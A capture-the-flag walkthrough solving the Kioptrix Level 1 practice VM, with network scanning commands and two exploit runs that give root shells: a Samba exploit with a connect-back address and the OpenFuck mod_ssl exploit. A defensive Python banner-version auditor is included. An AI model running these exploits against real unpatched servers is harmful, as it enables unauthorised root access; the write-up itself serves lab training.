Hello, in this article I will show you step by step how to solve Kioptrix Level 1. The goal of this CTF is to become root.
LEVEL : Easy
Steps
- Learning the target’s IP address with Netdiscover tool
- Detection of open ports with Nmap tool
- Reverse Shell via Samba exploit (Solution 1)
- Collecting information via port 80 with Dirb and Nikto tools (Solution 2)
- Reverse Shell via OpenSSL exploit (Solution 2)
Based on the IP information of the Kali machine, the IP address used by the target machine was determined with the following command.
netdiscover -r 192.168.1.0/24
The detection of open ports on the target machine was done as follows.
nmap -A -Pn -n -sV -sC -p- --reason 192.168.1.104
SOLUTION - 1
Port 139 was detected as SAMBA smbd and further detailed information could not be obtained with the Nmap tool. In this step, a port scan was performed specifically for port 139 via the MSFConsole tool and a more detailed result was obtained.
Research based on the information obtained turned up the following exploit.
When the downloaded exploit is used with the following parameters, a shell that can run commands with root rights is obtained.
./smb -b 0 -c 192.168.1.2 -p 130 192.168.1.104
SOLUTION - 2
Fuzzing was performed via dirb on open port 80. Afterwards, robots.txt was visited among the paths obtained.
dirb http://192.168.1.104/
The paths in robots.txt were visited and no results were obtained. In this step, a tool called nikto was used to collect more information.
nikto --host 192.168.1.104
Using the Nikto tool, the version string “mod_ssl 2.8.4” was obtained. Searching the internet for this information turned up the following GitHub repo.
The exploit was run successfully by following the README.MD in that repository and supplying the appropriate parameters. After this, a shell with root rights was received from the target.
./OpenFuck 0x6b 192.168.1.104 443 -c 40
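Solution 2 hinged on the web server disclosing "mod_ssl 2.8.4" in its banner. From the defender's side, the following added example (not part of the original walkthrough) audits a Server banner for disclosed component versions and for versions below a patch baseline. The banner, apart from the mod_ssl token, and the floor values are constructed for illustration, and the function names are hypothetical.

```python
import re

# One "product/version" token; a trailing letter (e.g. 0.9.6b) is kept in the
# raw string but ignored for numeric comparison.
TOKEN = re.compile(r"([A-Za-z][\w+-]*)/((\d+(?:\.\d+)*)[a-z]*)")

# Constructed floors for illustration only; replace with your patch baseline.
EXAMPLE_FLOORS = {"mod_ssl": (2, 9, 0), "openssl": (1, 0, 0)}

# Constructed banner; only the mod_ssl/2.8.4 token comes from the walkthrough.
SAMPLE_BANNER = "Apache/1.3.0 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b"


def parse_banner(banner):
    """Map each lower-cased product to (numeric version tuple, raw version)."""
    parsed = {}
    for name, raw, numeric in TOKEN.findall(banner):
        parsed[name.lower()] = (tuple(int(p) for p in numeric.split(".")), raw)
    return parsed


def audit_banner(banner, floors=EXAMPLE_FLOORS):
    """Return findings: every disclosed version, plus any below its floor."""
    findings = []
    for name, (version, raw) in parse_banner(banner).items():
        findings.append(("disclosed", name, raw))
        floor = floors.get(name)
        if floor is not None and version < floor:
            findings.append(("below-floor", name, raw))
    return findings


if __name__ == "__main__":
    # "Apache" alone is what a banner looks like with versions suppressed.
    for banner in (SAMPLE_BANNER, "Apache"):
        print(banner, "->", audit_banner(banner) or "no version disclosed")
```

A bare "Apache" banner (what Apache's ServerTokens Prod setting produces) yields no findings, but suppressing the banner only removes the disclosure; the outdated component still has to be upgraded.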
Summary
- I think this article is very useful in that it shows you can use the information obtained from port enumeration to gain authority over the target with just a few operations, without it being too complicated.